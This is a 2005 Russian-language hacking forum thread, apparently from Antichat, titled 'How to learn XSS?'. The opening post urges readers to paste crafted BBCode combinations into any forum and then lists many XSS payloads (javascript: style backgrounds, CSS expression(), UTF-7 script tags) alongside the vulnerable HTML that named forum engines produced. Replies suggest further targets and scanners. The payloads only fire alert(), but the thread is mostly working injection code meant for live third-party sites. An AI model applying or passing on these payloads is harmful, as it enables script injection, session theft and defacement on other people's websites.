Как научится Xss?

tys · 26 Nov 2005

Как научится XSS?

А вот так,

Берем вот эту комбинацию, и суём на любой форум.

HTML:

[url]http://www.wj'"`.com[/url]
[url=http://www.wj'"`.com]wj[/url]
[email]wj@wj'"`.com[/email]
[email=wj@wj'"`.com]wj[/email]
[img]http://www.wj'"`.gif[/img]

[url]http://www.wj1[url]http://www.wj1.com[/url].com[/url]
[url=http://www.wj2[url]http://www.wj2.com[/url].com]wj2[/url]
[email]wj3@wj3[url]http://www.wj3.com[/url].com[/email] 
[email=wj4@wj4[url]http://www.wj4.com[/url].com]wj4[/email]
[img]http://www.wj5[url]http://www.wj5.com[/url].gif[/img]

[url]http://www.wj6[url=http://www.wj6.com]wj6[/url].com[/url]
[url=http://www.wj7[url=http://www.wj7.com]wj7[/url].com]wj7[/url]
[email]wj8@wj8[url=http://www.wj8.com]wj8[/url].com[/email]
[email=wj9@wj9[url=http://www.wj9.com]wj9[/url].com]wj9[/email]
[img]http://www.wj10[url=http://www.wj10.com]wj10[/url].gif[/img]

[url]http://www.wj11[email][email protected][/email].com[/url]
[url=http://www.wj12[email][email protected][/email].com]wj12[/url]
[email]wj13@wj13[email][email protected][/email].com[/email]
[email=wj14@wj14[email][email protected][/email].com]wj14[/email]
[img]http://www.wj15[email][email protected][/email].gif[/img]

[url]http://www.wj16[[email protected]]wj16[/email].com[/url]
[url=http://www.wj17[[email protected]]wj17[/email].com]wj17[/url]
[email]wj18@wj18[[email protected]]wj18[/email].com[/email]
[email=wj19@wj19[[email protected]]wj19[/email].com]wj19[/email]
[img]http://www.wj20[[email protected]]wj20[/email].gif[/img]

[url]http://www.wj21[img]http://www.wj21.gif[/img].com[/url]
[url=http://www.wj22[img]http://www.wj22.gif[/img].com]wj22[/url]
[email]wj23@wj23[img]http://www.wj23.gif[/img].com[/email]
[email=wj24@wj24[img]http://www.wj24.gif[/img].com]wj24[/email]
[img]http://www.wj25[img]http://www.wj25.gif[/img].gif[/img]

Вот результат,

Иду по списку... :rolleyes:

http://www.foruminsider.com/index.php?act=directory

Alert.

HTML:

<dbml:font face="Edwardian "wj  style=display:none;background:url(javascript:alert())>

Result.

HTML:

<FONT face="Edwardian "wj  style=display:none;background:url(javascript:alert())>

Powered by AppliedBB[.QUOTE] = Unrealesed.

Alert.

HTML:

[img]http://www.wj[img]http://www.wj.gif`=`[/img][/img]`style=`display:none;background:url(javascript:alert())`

Result.

HTML:

<img src="http://www.wj<img src="http://www.wj.gif`=` border=0 />" border="0" />`style=`display:none;background:url(javascript:alert())`

Alert.

HTML:

[url]http://www.wj6[url=http://www.wj6.com`=`][/url][/url]`style=`display:none;background:url(javascript:alert())`

Result.

HTML:

<a href="http://www.wj6<a href="http://www.wj6.com`=`" target="_blank">" target="_blank">http://www.wj6<a href="http://www.wj6.com`=`" target="_blank"></a></a>`style=`display:none;background:url(javascript:alert())`

Alert.

HTML:

+ADw-/title+AD4APA-script+AD4-alert(/WJ/)+ADsAPA-/script+AD4-

Result.

HTML:

+ADw-/title+AD4APA-script+AD4-alert(/WJ/)+ADsAPA-/script+AD4-

Comment: Тегов нет, но в мессаге и в названии темы, XSS атака UTF-7 проходит.

Alert.

HTML:

[email]wj18@wj18[[email protected]`=`]wj18[/email].com[/email]`style=`display:none;background:url(javascript:alert())`

Result.

HTML:

<a href="mailto:wj18@wj18<a href="mailto:[email protected]`=`">wj18">wj18@wj18[[email protected]`=`]wj18</a>.com</a>`style=`display:none;background:url(javascript:alert())`

= Unrealesed.

Alert.

HTML:

[email]wj8@wj8[url=http://www.wj8.com/style=background:expression(alert());]wj8[/url].com[/email]/[HTML]

Result.

[HTML]<a href="mailto:wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com">wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com</a>

Alert.

HTML:

[email]wj8@wj8[url=http://www.wj8.com/style=background:expression(alert());]wj8[/url].com[/email]

Result.

HTML:

<a href="mailto:wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com">wj8@wj8<a href="http://www.wj8.com/style=background:expression(alert());" target="_blank">wj8</a>.com</a>

Alert.

HTML:

[url=http://www.wj17[email=wj17@wj17`=`]wj17[/email].com]wj17[/url]` style=`background:url(javaSCrip	t:alert(/Hi_from_Algol/))`
[email]wj18@wj18[[email protected]]wj18[/email].com[/email]

Result.

HTML:

<table width='95%' align='center' cellpadding='3' cellspacing='1' class='table'><tr><td class='type_t'><br><a target='_new' href="http://www.wj17<a href="mailto:wj17@wj17`=`">wj17[/email">.com]wj17</a>` style=`background:url(javaSCrip	t:alert(/Hi_from_Algol/))`<br>[email]wj18@wj18[[email protected]]wj18</a>.com[/email]<br></td></tr></table>

Alert.

HTML:

[url]http://www.wj21[img]http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif[/img].com[/url]

Result.

HTML:

<a href="http://www.wj21<img src="http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif" alt="" style="border: 0;" />.com" target="_blank">http://www.wj21<img src="http://www.wj21/style=`background:url(javascript:alert(/Hi_from_Algol/))`.gif" alt="" style="border: 0;" />.com</a>

Alert.

HTML:

[email]wj3@wj3[url]http://www.wj3.com`=`[/url].com[/email]`style=`background:url(javascript:alert(/wj/));`

Result.

HTML:

<font class="mfont"><a href="mailto:wj3@wj3<a href="http://www.wj3.com`=`">http://www.wj3.com`=`</a>.com">wj3@wj3<a href="http://www.wj3.com`=`">http://www.wj3.com`=`</a>.com</a>`style=`background:url(javascript:alert(/wj/));`     </font>

Alert.

HTML:

[email]wj3@wj3[url]http://www.wj3.com`=`[/url].com[/email]`style=`background:url(javascript:alert(/wj/));`

Result.

HTML:

<font class=ntext><a href="mailto:wj3@wj3<a href="http://www.wj3.com`=`?session=S2jGuGVITxFMy4Xk10fK8dc5jy" target=_top>http://www.wj3.com`=`</a>.com">wj3@wj3<a href="http://www.wj3.com`=`?session=S2jGuGVITxFMy4Xk10fK8dc5jy" target=_top>http://www.wj3.com`=`</a>.com</a>`style=`background:url(javascript:alert(/wj/));`</font>

Alert.

HTML:

[[email protected] wj=`]wj[/email]`style=`background:url(javascript:alert(/wj/));`

Result.

HTML:

<[email protected] wj=`>wj</email>`style=`background:url(javascript:alert(/wj/));`</ul>

Alert.

HTML:

[email=wj@wj'"`.com wj=`]wj[/email]` style=`background:url(javaSCrip	t:alert(/Hi_from_Algol/))`

Result.

HTML:

<blockquote>
         <email=wj@wj'"`.com wj=`>wj</email>` style=`background:url(javaSCrip	t:alert(/Hi_from_Algol/))`
         </blockquote>

Alert.

HTML:

[img]http://www.wj10[url=http://www.wj10.com`=`]wj10[/url].gif[/img]` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`

Result.

HTML:

<img src="http://www.wj10<a href="http://www.wj10.com`=`" title="www.wj10.com`=`" target="_new">wj10</a>.gif" border="0">` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`

Alert.

HTML:

[img]http://www.wj10[url=http://www.wj10.com`=`]wj10[/url].gif[/img]` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`

Result.

HTML:

<img src="http://www.wj10<a href="http://www.wj10.com`=`" title="www.wj10.com`=`" target="_new">wj10</a>.gif" border="0">` style=`dysplay:none;background:url(javaSCript:alert(/Hi_from_Algol/))`

Click to expand...

africanec · 26 Nov 2005

wj FUDforum последний посмари !

tys · 26 Nov 2005

africanec said:

wj FUDforum последний посмари !
Click to expand...

В смысле? О_о

africanec · 26 Nov 2005

всысле на FUdforum просто сморю во всяких разных находишь может и там найдешь
вот в таких fudforum.org/forum/

africanec · 27 Nov 2005

wj мне ето негорит я просто предложил типа идей у тебя же рвения и знания полно
а так я предпочитаю сам искать хоть долго зато понятно откуда и что

Xex · 28 Nov 2005

Кстати давно приходила мысль, а не заморочится ли кому нить написанием сканера XSS - уязвимостей, типа nmap...с пополнением базы данных...

africanec · 28 Nov 2005

Xex
они есть

Xex · 28 Nov 2005

смысли есть, но пока недоступны для общества?...

africanec · 2 Dec 2005

всмысле недоступны у гугля их полно

Tikson · 2 Dec 2005

всмысле недоступны у гугля их полно
Click to expand...

ага там даже ссылка на главной странице есть, раздел "софт" =))
tys молодец !!!

De_X · 3 Dec 2005

ИНТЕРЕСНО как начинающие это будут разбирать?

GreenBear · 3 Dec 2005

Я думаю, что у кого есть желание - тот поймет.
Даны основные коды, и как они нарушают кол. Далее ты сам уже разбирайся, если нужно. Если нет, то обходи сосновым лесом. Вот и все.

NaX[no]rT · 4 Dec 2005

как то раз выкладывалась интересная ссылка по XSS или меня клинит.
Вот она http://ha.ckers.org/xss.html - рассмотрено уйма случаев

Gosip · 4 Dec 2005

А почему тему перенесли из раздела Наши Статьи?

Tikson · 7 Dec 2005

Я думаю, что у кого есть желание - тот поймет.
Click to expand...

в точку а это все возможные варианты
зы а я предпологал что имено так они и находятся втом смысле что я это уже гдето видел года 2 назат =)))

Как научится Xss?

tys Banned

africanec Banned

tys Banned

africanec Banned

africanec Banned

Xex Banned

africanec Banned

Xex Banned

africanec Banned

Tikson Elder - Старейшина

De_X Banned

GreenBear наркоман с медалью

NaX[no]rT Members of Antichat

Gosip Guest

Tikson Elder - Старейшина

Useful Searches

Как научится Xss?

tys Banned

africanec Banned

tys Banned

africanec Banned

africanec Banned

Xex Banned

africanec Banned

Xex Banned

africanec Banned

Tikson Elder - Старейшина

De_X Banned

GreenBear наркоман с медалью

NaX[no]rT Members of Antichat

Gosip Guest

Tikson Elder - Старейшина